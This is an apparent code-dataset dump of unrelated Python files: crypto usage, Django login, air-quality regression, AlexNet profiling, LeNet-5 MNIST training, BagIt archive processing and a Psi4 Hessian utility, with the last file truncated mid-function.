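# A minimal usage sketch (not part of the original module): hybrid encryption, where
# a fresh AES session key protects the payload and RSA protects the session key.
if __name__ == '__main__':
    public_key, private_key = CryptoRSA.gen_key()
    session_key = CryptoAES.generate_key()
    message = b'hello world'
    # encrypt the payload with AES-GCM, wrap the session key with RSA-OAEP
    ciphertext = CryptoAES.encrypt(message, session_key)
    wrapped_key = CryptoRSA.encrypt(session_key, public_key)
    # sign the ciphertext so the receiver can check its origin
    signature = CryptoRSA.sign(ciphertext, private_key)
    # receiver side: unwrap the key, verify the signature, then decrypt
    recovered_key = CryptoRSA.decrypt(wrapped_key, private_key)
    assert CryptoRSA.verify(ciphertext, signature, public_key)
    assert CryptoAES.decrypt(ciphertext, recovered_key) == message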
``` |
{
"source": "johnDenbrough/recipe-app-api",
"score": 4
} |
#### File: app/app/calc.py
```python
def add(x, y):
"""add 2 numbers together"""
return x + y
def subtract(x, y):
"""subctract 2 numbers"""
return y - x
``` |
{
"source": "JohndeVostok/IMUSE",
"score": 2
} |
#### File: IMUSE/IMUSE/login_view.py
```python
from django import forms
from django.shortcuts import render, render_to_response
from django.template import RequestContext
from django.http import HttpResponse, HttpResponseRedirect, Http404
from django.contrib import auth
from django.contrib.auth.models import User
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_protect
from regist_view import regist
#from models import User
class LoginForm(forms.Form):
username = forms.CharField(max_length = 50, widget = forms.TextInput(attrs = {"placeholder": "User ID"}))
password = forms.CharField(widget = forms.PasswordInput(attrs = {"placeholder": "Password"}))
def clean(self):
if (auth.authenticate(username = self.cleaned_data['username'], password = self.cleaned_data['password'])) is None:
raise forms.ValidationError("Invalid handle or password")
return self.cleaned_data
@csrf_protect
def login(req):
if req.method == 'POST':
form = LoginForm(req.POST)
if not form.is_valid():
return render(req, 'login.html', {'form': form})
username = form.cleaned_data['username']
password = form.cleaned_data['password']
user = auth.authenticate(username = username, password = password)
if user is not None:
auth.login(req, user)
return HttpResponseRedirect("/user/")
else:
raise Http404
else:
login_form = LoginForm()
return render(req, 'login.html', {'form': login_form})
``` |
{
"source": "JohndeVostok/KDD-CUP",
"score": 2
} |
#### File: KDD-CUP/src/fix.py
```python
import pickle
def getBox(idx):
tmp = [[] for i in range(24)]
for i, x in enumerate(data[idx]):
if (x != 0):
tmp[i % 24].append(x)
ans = [[] for i in range(24)]
for i in range(24):
tmp[i].sort()
q1 = tmp[i][int(len(tmp[i]) / 4)]
q3 = tmp[i][int(len(tmp[i]) * 3 / 4)]
iqr = q3 - q1
mn = max([min(tmp[i]), q1 - 1.5 * iqr])
mx = min([max(tmp[i]), q3 + 1.5 * iqr])
ans[i] = [mn, mx, q1, q3]
res.append(ans)
if __name__ == "__main__":
with open("../data/beijing_data.pkl", "rb") as f:
data = pickle.load(f)
res = []
for i in range(35):
getBox(i * 6 + 0)
getBox(i * 6 + 1)
getBox(i * 6 + 4)
with open("../data/bj_box.pkl", "wb") as f:
pickle.dump(res, f)
with open("../data/london_data.pkl", "rb") as f:
data = pickle.load(f)
res = []
for i in range(13):
getBox(i * 3 + 0)
getBox(i * 3 + 1)
with open("../data/ld_box.pkl", "wb") as f:
pickle.dump(res, f)
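    # Layout of the saved boxes (a reading sketch, not part of the original script):
    # each res entry holds per-hour statistics, res[k][hour] = [mn, mx, q1, q3], i.e.
    # the clipped whisker bounds and quartiles for that series at that hour of day:
    #   with open("../data/bj_box.pkl", "rb") as f:
    #       bj_box = pickle.load(f)
    #   mn, mx, q1, q3 = bj_box[0][8]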
```
#### File: KDD-CUP/src/ld_ols.py
```python
import pickle
import numpy
import time
import math
from sklearn.linear_model import LinearRegression
aqstations = {'BL0':0, 'CD1':1, 'CD9':2, 'GN0':3, 'GN3':4, 'GR4':5, 'GR9':6, 'HV1':7, 'KF1':8, 'LW2':9,
'ST5':10, 'TH4':11, 'MY7':12}
ngrid = 861
def getCoef(idx):
py = tmpdata[24:]
linear = LinearRegression()
linear.fit(px, py)
res.append([linear.coef_, linear.intercept_])
if __name__ == "__main__":
with open("../data/london_data.pkl", "rb") as f:
dat = pickle.load(f)
l = len(dat[0])
px = numpy.zeros(((l - 48), (ngrid * 4 + 19)), dtype = numpy.float32)
for i in range(48, l):
for j in range(ngrid):
px[i - 48][j * 4] = dat[72 + j * 5][i - 24]
px[i - 48][j * 4 + 1] = dat[72 + j * 5 + 1][i - 24]
px[i - 48][j * 4 + 2] = dat[72 + j * 5 + 2][i - 24]
px[i - 48][j * 4 + 3] = dat[72 + j * 5 + 4][i - 24]
res = []
for st in aqstations:
print(st)
print("PM2.5")
idx = aqstations[st] * 3 + 0
tmpdata = numpy.zeros(l - 24)
for i in range(24, l):
tmpdata[i - 24] = dat[idx][i] - dat[idx][i - 24]
for i in range(48, l):
px[i - 48][ngrid * 4] = math.sin(i / 12 * math.pi)
for j in range(1, 19):
px[i - 48][ngrid * 4 + j] = tmpdata[i - 24 - j]
getCoef(idx)
print("PM10")
idx = aqstations[st] * 3 + 1
tmpdata = numpy.zeros(l - 24)
for i in range(24, l):
tmpdata[i - 24] = dat[idx][i] - dat[idx][i - 24]
for i in range(48, l):
px[i - 48][ngrid * 4] = math.sin(i / 12 * math.pi)
for j in range(1, 19):
px[i - 48][ngrid * 4 + j] = tmpdata[i - 24 - j]
getCoef(idx)
with open("../data/ldols_res.pkl", "wb") as f:
pickle.dump(res, f)
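    # Layout of the saved result (a reading sketch, not part of the original script):
    # res holds two entries per station in aqstations order (PM2.5, then PM10), each
    # being [linear.coef_, linear.intercept_] for the 24-hour differenced model:
    #   with open("../data/ldols_res.pkl", "rb") as f:
    #       ols = pickle.load(f)
    #   coef, intercept = ols[0]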
``` |
{
"source": "JohndeVostok/tftest",
"score": 3
} |
#### File: src/pyscript/alexnet.py
```python
import os
import time
import tensorflow as tf
from tensorflow.python.client import timeline
from tensorflow.python.framework import meta_graph
batch_size = 32
num_batches = 100
def print_tensor_info(tensor):
print("tensor name:", tensor.op.name, "-tensor shape:", tensor.get_shape().as_list())
def inference(images):
parameters = []
with tf.name_scope("conv1") as scope:
kernel1 = tf.Variable(tf.truncated_normal([11, 11, 3, 64], mean=0, stddev=0.1, dtype=tf.float32), name="weights")
conv = tf.nn.conv2d(images, kernel1, [1, 4, 4, 1], padding="SAME")
biases = tf.Variable(tf.constant(0, shape=[64], dtype=tf.float32), trainable=True, name="biases")
bias = tf.nn.bias_add(conv, biases)
conv1 = tf.nn.relu(bias, name=scope)
print_tensor_info(conv1)
parameters += [kernel1, biases]
lrn1 = tf.nn.lrn(conv1, 4, bias=1, alpha=1e-3 / 9, beta=0.75, name="lrn1")
pool1 = tf.nn.max_pool(lrn1, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding="VALID", name="pool1")
print_tensor_info(pool1)
with tf.name_scope("conv2") as scope:
kernel2 = tf.Variable(tf.truncated_normal([5, 5, 64, 192], dtype=tf.float32, stddev=0.1)
, name="weights")
conv = tf.nn.conv2d(pool1, kernel2, [1, 1, 1, 1], padding="SAME")
biases = tf.Variable(tf.constant(0, dtype=tf.float32, shape=[192])
, trainable=True, name="biases")
bias = tf.nn.bias_add(conv, biases)
conv2 = tf.nn.relu(bias, name=scope)
print_tensor_info(conv2)
parameters += [kernel2, biases]
lrn2 = tf.nn.lrn(conv2, 4, 1.0, alpha=1e-3 / 9, beta=0.75, name="lrn2")
pool2 = tf.nn.max_pool(lrn2, [1, 3, 3, 1], [1, 2, 2, 1], padding="VALID", name="pool2")
print_tensor_info(pool2)
with tf.name_scope("conv3") as scope:
kernel3 = tf.Variable(tf.truncated_normal([3, 3, 192, 384], dtype=tf.float32, stddev=0.1)
, name="weights")
conv = tf.nn.conv2d(pool2, kernel3, strides=[1, 1, 1, 1], padding="SAME")
biases = tf.Variable(tf.constant(0.0, shape=[384], dtype=tf.float32), trainable=True, name="biases")
bias = tf.nn.bias_add(conv, biases)
conv3 = tf.nn.relu(bias, name=scope)
parameters += [kernel3, biases]
print_tensor_info(conv3)
with tf.name_scope("conv4") as scope:
kernel4 = tf.Variable(tf.truncated_normal([3, 3, 384, 256], stddev=0.1, dtype=tf.float32),
name="weights")
conv = tf.nn.conv2d(conv3, kernel4, strides=[1, 1, 1, 1], padding="SAME")
biases = tf.Variable(tf.constant(0.0, dtype=tf.float32, shape=[256]), trainable=True, name="biases")
bias = tf.nn.bias_add(conv, biases)
conv4 = tf.nn.relu(bias, name=scope)
parameters += [kernel4, biases]
print_tensor_info(conv4)
with tf.name_scope("conv5") as scope:
kernel5 = tf.Variable(tf.truncated_normal([3, 3, 256, 256], stddev=0.1, dtype=tf.float32),
name="weights")
conv = tf.nn.conv2d(conv4, kernel5, strides=[1, 1, 1, 1], padding="SAME")
biases = tf.Variable(tf.constant(0.0, dtype=tf.float32, shape=[256]), name="biases")
bias = tf.nn.bias_add(conv, biases)
conv5 = tf.nn.relu(bias)
parameters += [kernel5, bias]
pool5 = tf.nn.max_pool(conv5, [1, 3, 3, 1], [1, 2, 2, 1], padding="VALID", name="pool5")
print_tensor_info(pool5)
pool5 = tf.reshape(pool5, (-1, 6 * 6 * 256))
weight6 = tf.Variable(tf.truncated_normal([6 * 6 * 256, 4096], stddev=0.1, dtype=tf.float32),
name="weight6")
ful_bias1 = tf.Variable(tf.constant(0.0, dtype=tf.float32, shape=[4096]), name="ful_bias1")
ful_con1 = tf.nn.relu(tf.add(tf.matmul(pool5, weight6), ful_bias1))
weight7 = tf.Variable(tf.truncated_normal([4096, 4096], stddev=0.1, dtype=tf.float32),
name="weight7")
ful_bias2 = tf.Variable(tf.constant(0.0, dtype=tf.float32, shape=[4096]), name="ful_bias2")
ful_con2 = tf.nn.relu(tf.add(tf.matmul(ful_con1, weight7), ful_bias2))
weight8 = tf.Variable(tf.truncated_normal([4096, 1000], stddev=0.1, dtype=tf.float32),
name="weight8")
ful_bias3 = tf.Variable(tf.constant(0.0, dtype=tf.float32, shape=[1000]), name="ful_bias3")
ful_con3 = tf.nn.relu(tf.add(tf.matmul(ful_con2, weight8), ful_bias3))
weight9 = tf.Variable(tf.truncated_normal([1000, 10], stddev=0.1), dtype=tf.float32, name="weight9")
bias9 = tf.Variable(tf.constant(0.0, shape=[10]), dtype=tf.float32, name="bias9")
output_softmax = tf.nn.softmax(tf.matmul(ful_con3, weight9) + bias9)
return output_softmax, parameters
if __name__ == "__main__":
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
image_size = 224
images = tf.Variable(tf.random_normal([batch_size, image_size, image_size, 3]))
output, parameters = inference(images)
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
objective = tf.nn.l2_loss(output)
grad = tf.gradients(objective, parameters)
mg = meta_graph.create_meta_graph_def(graph=sess.graph)
with open('alexnet_graph.json', "w") as f:
nodes = []
for n in sess.graph_def.node:
nodes.append("{\"name\":\"" + str(n.name) + "\",\"input\":\"" + str(n.input) + "\"}")
f.write("{\"nodes\":[\n")
f.write(",".join(nodes))
f.write("]}")
run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)
run_metadata = tf.RunMetadata()
time_st = time.time()
sess.run(grad, options=run_options, run_metadata=run_metadata)
time_ed = time.time()
with open('alexnet_runtime.json', 'w') as f:
f.write(str(time_ed - time_st))
tl = timeline.Timeline(run_metadata.step_stats)
ctf = tl.generate_chrome_trace_format()
with open('alexnet_timeline.json', 'w') as f:
f.write(ctf)
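    # Note (not in the original script): alexnet_timeline.json is a Chrome trace, so it
    # can be opened in chrome://tracing or a compatible viewer to inspect per-op timing
    # for the single profiled step; alexnet_runtime.json records the wall-clock time.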
``` |
{
"source": "JohndeVostok/THU-Artificial-Intelligent",
"score": 3
} |
#### File: THU-Artificial-Intelligent/digit/lenet-5.py
```python
import math
import numpy as np
import torch
from torch import nn
from torch.nn import functional as F
from torch.utils.data import TensorDataset, DataLoader
from torchvision import transforms
BATCHSIZE = 256
kwargs = {'num_workers': 2, 'pin_memory': True}  # DataLoader parameters
def initData():
with open("train.csv", "r") as f:
lines = f.readlines()
trainLabels = []
trainImages = []
for line in lines[1:]:
tmp = line.strip().split(",")
trainLabels.append(int(tmp[0]))
trainImages.append([int(x) for x in tmp[1:]])
testImages = []
with open("test.csv", "r") as f:
lines = f.readlines()
testImages = []
for line in lines[1:]:
tmp = line.strip().split(",")
testImages.append([int(x) for x in tmp])
return trainLabels, trainImages, testImages
class LeNet5(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(1, 6, 5, padding=2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.fc1 = nn.Linear(16*5*5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
x = F.max_pool2d(F.relu(self.conv1(x)), (2, 2))
x = F.max_pool2d(F.relu(self.conv2(x)), (2, 2))
x = x.view(-1, 400)
# print('size', x.size())
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
def initWeight(m):
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
        m.weight.data.fill_(1)
m.bias.data.zero_()
def train(model, criterion, optimizer, trainLoader, epoch):
model.train()
for batch_idx, (data, target) in enumerate(trainLoader):
data, target = data.cuda(), target.cuda()
optimizer.zero_grad()
output = model(data)
loss = criterion(output, target)
loss.backward()
optimizer.step()
print('Train Epoch: {}\tLoss: {:.6f}'.format(epoch, loss.item()))
def valid(model, criterion, validLoader, epoch):
model.eval()
test_loss = 0
correct = 0
for data, target in validLoader:
data, target = data.cuda(), target.cuda()
with torch.no_grad():
output = model(data)
test_loss += criterion(output, target).item()
pred = output.data.max(1, keepdim=True)[1]
correct += pred.eq(target.data.view_as(pred)).cpu().sum()
test_loss /= len(validLoader.dataset)
print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)\n'.format(
test_loss, correct, len(validLoader.dataset),
100. * correct / len(validLoader.dataset)))
def test(model, testLoader):
model.eval()
result = []
for data in testLoader:
data = data[0].cuda()
with torch.no_grad():
output = model(data)
pred = output.data.max(1, keepdim=True)[1]
for x in pred:
result.append(x.item())
id = 0
text = "ImageId,Label\n"
for x in result:
id += 1
text += str(id) + "," + str(x) + "\n"
with open("submit-cnn.csv", "w") as f:
f.write(text)
if __name__ == "__main__":
print(LeNet5())
dataLabels, dataImages, testImages = initData()
trainLabels = dataLabels[:40000]
trainImages = dataImages[:40000]
validLabels = dataLabels[40000:]
validImages = dataImages[40000:]
trainX = torch.from_numpy(np.array(trainImages).reshape(-1, 1, 28, 28)).float()
trainY = torch.from_numpy(np.array(trainLabels).astype(int))
validX = torch.from_numpy(np.array(validImages).reshape(-1, 1, 28, 28)).float()
validY = torch.from_numpy(np.array(validLabels).astype(int))
testX = torch.from_numpy(np.array(testImages).reshape(-1, 1, 28, 28)).float()
trainDataset = TensorDataset(trainX, trainY)
validDataset = TensorDataset(validX, validY)
testDataset = TensorDataset(testX)
trainLoader = DataLoader(dataset=trainDataset, shuffle=True, batch_size=BATCHSIZE, **kwargs)
validLoader = DataLoader(dataset=validDataset, shuffle=True, batch_size=BATCHSIZE, **kwargs)
testLoader = DataLoader(dataset=testDataset, shuffle=False, batch_size=BATCHSIZE, **kwargs)
model = LeNet5().cuda()
criterion = nn.CrossEntropyLoss(size_average=False)
optimizer = torch.optim.Adam(model.parameters(), lr=0.001, betas=(0.9, 0.99))
model.apply(initWeight)
for epoch in range(128):
train(model, criterion, optimizer, trainLoader, epoch)
valid(model, criterion, validLoader, epoch)
test(model, testLoader)
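    # Optional follow-up (a sketch, not in the original script): persist the trained
    # weights with torch.save(model.state_dict(), "lenet5_mnist.pt") and reload them
    # later via model.load_state_dict(torch.load("lenet5_mnist.pt")).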
``` |
{
"source": "JohndeVostok/THU-Combinatorial-Mathematics",
"score": 3
} |
#### File: project/plt/plt_sp.py
```python
import math
import matplotlib.pyplot as plt
def load_data(data_path):
with open(data_path) as f:
lines = f.readlines()
data = []
for line in lines:
data.append(int(line.strip()))
return data
if __name__ == "__main__":
x = range(1, 13)
# theory = [1]
# for i in range(2, 13):
# theory.append(theory[-1] * i)
stl = load_data("data/stl_sp.txt")
rec = load_data("data/rec_sp.txt")
dic = load_data("data/dict_sp.txt")
sjt = load_data("data/sjt_sp.txt")
for i in range(12):
# theory[i] = math.log(theory[i], 2)
stl[i] = math.log(stl[i], 2)
rec[i] = math.log(rec[i], 2)
dic[i] = math.log(dic[i], 2)
sjt[i] = math.log(sjt[i], 2)
plt.xlabel("Payload")
plt.ylabel("Log Time (us)")
# plt.plot(x, theory)
plt.plot(x, sjt, label="SJT")
plt.plot(x, stl, label="STL")
    plt.plot(x, rec, label="Recursive")
plt.plot(x, dic, label="Dictionary")
plt.legend()
plt.savefig("img/fig_sp.pdf")
plt.show()
``` |
{
"source": "JohndeVostok/THU-EDA-homework",
"score": 3
} |
#### File: THU-EDA-homework/homework3/cluster.py
```python
def compatible(a, b):
if len(a) != len(b):
return False
n = len(a)
for i in range(n):
if a[i] != -1 and b[i] != -1 and a[i] != b[i]:
return False
return True
def partition(comp):
n = len(comp)
rest = range(n)
res = [-1 for i in range(n)]
t = 0
while len(rest) > 0:
flag = 1
for i in rest:
for j in rest:
if not comp[i][j]:
nodes = [i, j]
flag = 0
break
if not flag:
break
if flag:
for i in rest:
res[i] = t
t += 1
break
for i in rest:
flag = 1
for node in nodes:
                if comp[i][node]:
flag = 0
break
if flag:
nodes.append(i)
s = [[i] for i in nodes]
restt = []
for i in rest:
for idx, group in enumerate(s):
flag = 1
for node in group:
if not comp[i][node]:
flag = 0
break
if flag:
res[i] = t + idx
if group[0] != i:
group.append(i)
break
if res[i] == -1:
restt.append(i)
t += len(s)
rest = restt
return res
if __name__ == "__main__":
with open("test2.in", "r") as f:
lines = f.readlines()
data = [[int(term) for term in line.strip().split()] for line in lines]
n, m = data[0]
next, output = [], []
for i in range(1, n + 1):
next.append(data[i][0:m])
output.append(data[i][m:])
comp = [[1 for i in range(n)] for i in range(n)]
flag = 0
for i in range(n):
for j in range(n):
if not compatible(output[i], output[j]):
flag = 1
comp[i][j] = 0
while flag:
flag = 0
for i in range(n):
for j in range(n):
if comp[i][j]:
for k in range(m):
if next[i][k] != -1 and next[j][k] != -1 and not comp[next[i][k]][next[j][k]]:
flag = 1
comp[i][j] = 0
break
res = partition(comp)
str = " ".join([str(term) for term in res])
with open("test2.out", "w") as f:
f.write(str)
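    # Note on the output (a sketch of interpretation): test2.out holds one line of
    # space-separated group indices, where res[i] is the cluster assigned to state i
    # and states sharing an index are pairwise compatible.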
``` |
{
"source": "johndewees/bag_manipulation",
"score": 2
} |
#### File: johndewees/bag_manipulation/bagit_script.py
```python
import re
import os
import shutil
from bdbag import bdbag_api
from bagit import BagValidationError
from bdbag.bdbagit import BaggingInterruptedError
def extract_bags():
num_bags = 0
for file in os.listdir(path = 'bags_zip'):
#converts a zipped bag into a bag
bdbag_api.extract_bag('bags_zip/' + file, output_path = 'bags_extract', temp=False)
num_bags += 1
print('* Bag Extraction Complete *')
print('* Extracted {0} bags *'.format(str(num_bags)))
def validate_bags():
error_log_handle = open('validation_error_log.txt', 'a')
filevar = 'TECHMD.xml'
num_bags = 0
for directory in os.listdir(path = 'bags_extract'):
#attempts to validate bags and logs any problem directories that raised errors
try:
bdbag_api.validate_bag('bags_extract/' + directory, fast = False)
except BagValidationError:
error_log_handle.write('Bag Validation Error | Directory: ' + directory + '\n')
except BaggingInterruptedError:
error_log_handle.write('Bagging Interruped Error | Directory: ' + directory + '\n')
except RuntimeError:
error_log_handle.write('Runtime Error | Directory: ' + directory + '\n')
subdir = os.listdir(path = 'bags_extract/' + directory + '/data')
if filevar not in subdir:
error_log_handle.write('TECHMD.xml File Not Found Error | Directory: ' + directory + '\n')
shutil.rmtree('bags_extract/' + directory)
num_bags += 1
print('* Bag Validation Complete *')
print('* Validated {0} bags *'.format(str(num_bags)))
error_log_handle.close()
def process_bags():
num_bags = 0
    error_log_handle = open('validation_error_log.txt', 'r')
    error_log_str = error_log_handle.read()
for directory in os.listdir(path = 'bags_extract'):
#skips any directories that raised errors during validation
if error_log_str.find(directory) != -1 :
continue
else:
#converts the bags back into normal directories, removing bagit and manifest files
bdbag_api.revert_bag('bags_extract/' + directory)
#removes unnecessary files generated by Islandora
            unnecessary_files = ['foo.xml', 'foxml.xml', 'JP2.jp2', 'JPG.jpg', 'POLICY.xml', 'RELS-EXT.rdf', 'RELS-INT.rdf', 'TN.jpg', 'HOCR.html', 'OCR.txt', 'MP4.mp4', 'PROXY_MP3.mp3']
for file in os.listdir(path = 'bags_extract/' + directory):
                if file in unnecessary_files:
os.remove('bags_extract/' + directory + '/' +file)
#use regex to identify originally uploaded file name
xml = open('bags_extract/' + directory + '/TECHMD.xml')
fn_lst = []
for line in xml:
result = re.findall('>(.+\.OBJ\..+)<', line)
fn_lst = fn_lst + result
orig_file_name = fn_lst[0]
if orig_file_name.startswith('/'):
orig_file_name = orig_file_name[5:]
orig_file_name = orig_file_name.split('.')
orig_file_name = orig_file_name[0] + '.' + orig_file_name[2]
obj_file_name = ''
for file in os.listdir(path = 'bags_extract/' + directory):
if re.search('^OBJ', file):
obj_file_name = file
#rename the OBJ file to original filename pulled from TECHMD.xml
os.rename('bags_extract/' + directory + '/' + obj_file_name,'bags_extract/' + directory + '/' + orig_file_name)
num_bags += 1
error_log_handle.close()
print('* Bag Processing Complete *')
print('* Processed {0} bags *'.format(str(num_bags)))
def create_bags():
num_bags = 0
for directory in os.listdir(path = 'bags_extract'):
#creates new well formed bag for Preservica SIP
bdbag_api.make_bag('bags_extract/' + directory, algs = ['sha256'], metadata = {
'Source-Organization' : 'University of Rochester',
'Contact-Name' : '<NAME>',
'Contact-Email' : '<EMAIL>'})
#zips the bag to prepare for ingest into Preservica
bdbag_api.archive_bag('bags_extract/' + directory, bag_archiver = 'zip')
shutil.move('bags_extract/' + directory + '.zip', 'bags_upload/' + directory + '.zip')
print('-- Created: {0}.zip'.format(directory))
num_bags += 1
print('* Bag Creation Complete *')
print('* Created {0} bags *'.format(str(num_bags)))
print('* Check error log for problem assets *')
extract_bags()
validate_bags()
process_bags()
create_bags()
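# Directory layout assumed by the calls above (inferred from the paths in this script):
#   bags_zip/      zipped bags to be processed
#   bags_extract/  working area for extracted / reverted bags
#   bags_upload/   destination for the re-zipped Preservica SIP bags
# validation_error_log.txt is appended to by validate_bags() and read by process_bags().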
``` |
{
"source": "johndhead/build_num_cartormwt_hessian",
"score": 3
} |
#### File: johndhead/build_num_cartormwt_hessian/hess_freq.py
```python
import psi4
import numpy as np
import sys
import scipy.linalg
import scipy.stats
def ck_print(*args,turn_on=False):
""" function ck_print(*args,turn_on=False)
selectively reduces the number of prints
set turn_on = True to check project of trans and rot modes
working correctly
"""
if turn_on:
print(*args)
# routine to print out the numpy hess matrix
def print_hess(hess,title="numpy hess matrix",simple_int=False,prnt=False):
""" print out lower symmetrical part of the hess matrix
        hess is the hessian - numpy ndarray
simple_int = False for decimals - set to True if identity matrix
"""
hess_size = hess.shape[0]
numat = hess_size//3
psi4.core.print_out("\n%s -- num atoms = %d" % (title,numat))
if not prnt:
return
else:
if simple_int:
print(hess)
return
row = 0
for iat in range(numat):
psi4.core.print_out("\nAtom row %d" % iat)
col = 0
for jat in range(0,iat+1,2):
rstr = [str("%2d" % (row)),str("%2d"% (row+1)),str("%2d"% (row+2))]
for jjat in range(2):
if jat +jjat > iat:
continue
else:
for add_at in range(3):
rstr[add_at] += str(" %2d %10.3e %10.3e %10.3e" % (jat+jjat,hess[row+add_at,col],hess[row+add_at,col+1],hess[row+add_at,col+2]))
col += 3
if jat +jjat == iat:
row += 3
psi4.core.print_out("\n%s" % rstr[0])
psi4.core.print_out("\n%s" % rstr[1])
psi4.core.print_out("\n%s" % rstr[2])
psi4.core.print_out("\n-------------------------------------------------------------------------")
#row += 3
return
def prnt_vib_evec(evec,freq,mass):
""" routine to write the vibrational evec
Parameter
---------
evec: ndarray (3*nat,3*nat)
freq: ndarray (3*nat) (in 1/cm)
mass: list
    Returns
------
None
"""
#mm=np.array(mass)
nmodes=len(freq)
nat = len(mass)
if nmodes//3 != nat:
psi4.core.print_out("\nERROR: nmodes = %d and should = 3*nat, nat = %d" % (nmodes,nat))
return "Error with nat and nmodes"
# setup print labels
psi4.core.print_out("\n\n=========== Vibrational normal modes ============\n")
psi4.core.print_out("\n dvec = orthog mass wt cvec = cartesian disps")
#print("type(mass) = ",type(mass))
#vec = " 1234567 1234567 1234567 1234567"
Dvec = " dx dy dz Td "
Cvec = " cx cy cz Tc "
for im in range(nmodes):
avec = evec[:,im].reshape(nat,3)
Td = np.sum(avec**2,axis=1)
Totd = np.sum(Td)
Tc = Td/np.sqrt(mass)
Totc = np.sum(Tc)
mTc = mass*Tc
Tot_mtc = np.sum(mTc)
psi4.core.print_out("\n imode = %d freq = %9.4f" % (im,freq[im]))
psi4.core.print_out("\natom "+Dvec+Cvec+" m * Tc")
for iat in range(nat):
ic = 3 * iat
D = " %7.3f %7.3f %7.3f %7.3f " % (evec[ic,im],evec[ic+1,im],
evec[ic+2,im],Td[iat])
sm = 1./np.sqrt(mass[iat])
C = " %7.3f %7.3f %7.3f %7.3f " % (sm*evec[ic,im],sm*evec[ic+1,im],
sm*evec[ic+2,im],Tc[iat])
psi4.core.print_out("\n%3d %s %s %7.3f" % (iat,D,C,mTc[iat]))
psi4.core.print_out("\n Totals: TotD = %7.3f TotC = %7.3f Tot_mtc = %7.3f"
% (Totd, Totc, Tot_mtc))
return
def pseudo_invert_hess(freq, evec, ntran=3, nrot=3, teval= 0., reval = 0., detscl=1., inv_hess = False):
"""
    Forming pseudo-inverse hess matrix from the freq (evals) and evec of the starting projected mwt hess matrix
parameter
---------
freq: 1D ndarray
initial hess eigenvalues in wavenumbers (1/cm) - trans and rot vectors assumed to be listed first in hess evec
hess: ndarray
initial hess eigenvecs
ntran: int
no of translations modes (3)
nrot: int
no of rotational modes (3 or 2)
teval, reval: float
values to set the trans and rot modes eigenvalues in inverse
det_scl:
mass wt factors for "utmwt" or "atmwt" vib modes -- set to det_scl value for initial matrix
inv_hess: bool
True if init hess is an inverse matrix, False if a direct hess
Returns
-------
inverted_mat: ndarray
shape (3*numat,3*numat)
"""
# unit conversion
hartree2waveno = 219474.6
ck_print("hartree2waveno = %f" % hartree2waveno)
au2amu = 5.4857990907e-04 # CODATA recommend value 2019 = 5.485 799 090 65(16) e-04 ?? corrected 8-may-2020
#sqrt_au2amu = np.sqrt(au2amu/mass_unit) # convert amu from g to kg
sqrt_au2amu = np.sqrt(au2amu/1000.) # convert amu from g to kg
#Evib = hbar * omega = hbar * sqrt(k/m)
if inv_hess:
radpsec2waveno = 1./(hartree2waveno*sqrt_au2amu)
else: # unit conversion for mass weighted hessian
radpsec2waveno = hartree2waveno*sqrt_au2amu
ck_print("au2amu %f inv(au2amu) %f -- radpsec2waveno %f" % (au2amu,1./au2amu,radpsec2waveno))
# set up freq values
psi4.core.print_out("\n=== init freq values in 1/cm ->\n",freq)
freq_shft = 100. # freq shift in 1/cm
if teval > -3*freq_shft or reval > -3.*freq_shft:
teval = 0.
reval = 0.
freq_shft = 0.
psi4.core.print_out("\ninitial trans %f and rot %f 1/cm freq values -- freq_shft = %f" % (teval,reval,freq_shft))
for itran in range(ntran):
freq[itran] = teval + freq_shft*itran
for irot in range(nrot):
freq[ntran+irot] = reval + freq_shft* irot
psi4.core.print_out("\n=== shifted freq values in 1/cm ->\n",freq)
#set up mass_unit
mass_unit = 1000./detscl
# now convert freq in wavenumbers to freq1 in au
# freq1 corresponds to eigenvals of mwt hessian being inverted
# freq2 = 1/freq1 and is the eigenvalues of inverted hessian
# trans/rot frequencies of inverted matrix set to the teval and reval values given function args
scale = np.ones_like(freq)/radpsec2waveno
scale = scale**2
scale[freq<0] = -scale[freq<0]
freq1 = freq**2 * scale / mass_unit # convert freq in wavenumbers to eval of mass wt hessian
psi4.core.print_out("\nmass_unit = %f scale = \n" % mass_unit,scale,"\n freq1 -->\n",freq1)
#for ivec in range(mat_dim):
# psi4.core.print_out("\nivec %d scale[ivec] = %12.5e freq2[ivec] = %12.5e 1/freq2[ivec] = %12.5e"
# % (ivec,scale[ivec],freq2[ivec],1./freq2[ivec]))
if inv_hess:
# in freq calc
#freq = 1./(scale *np.sqrt(freq2))
# freq2 for inv_hess
#freq2 = 1./(scale * freq * mass_unit)
# freq 2 for direct hess = inverted inv hess
freq2 = freq1.copy()
# try inverting
# 1st effort
freq2[ntran+nrot:] = 1./freq1[ntran+nrot:]
# 2nd effort
#freq2[ntran+nrot:] = freq1[ntran+nrot:]
psi4.core.print_out("\nEigenvalues in au for direct mwt hess from inverted mwt hess")
# invert trans + rot if abs(freq1[0:6]) > 1.e-5
for imode in range(ntran+nrot):
if np.abs(freq1[imode]) > 1.e-5:
freq2[imode] = 1./freq1[imode]
psi4.core.print_out("\ninverting freq1[%d] = %15.7f --> %15.7f" % (imode,freq1[imode],freq2[imode]))
else:
psi4.core.print_out("\nnot inverting freq1[%d] = %15.7f to %15.7f freq2[^%d] = %15.7f"
% (imode,freq1[imode],1./freq1[imode],imode,freq2[imode]))
############################### here sat
else: # scale factor of direct mass_wted
# freq2 for direct hess
#freq2 = scale * freq * mass_unit
# freq 2 for inverted mwt hess = inverted direct hess
freq2 = freq1.copy()
# trying inverting
# 1st effort
#freq1[ntran+nrot:] = 1./freq2[ntran+nrot:]
# freq2 is the eval of the inverted matrx
# invert trans + rot if abs(freq1[0:6]) > 1.e-5
###for imode in range(ntran+nrot):
###if np.abs(freq1[imode]) > 1.e-5:
###freq2[imode] = 1./freq1[imode]
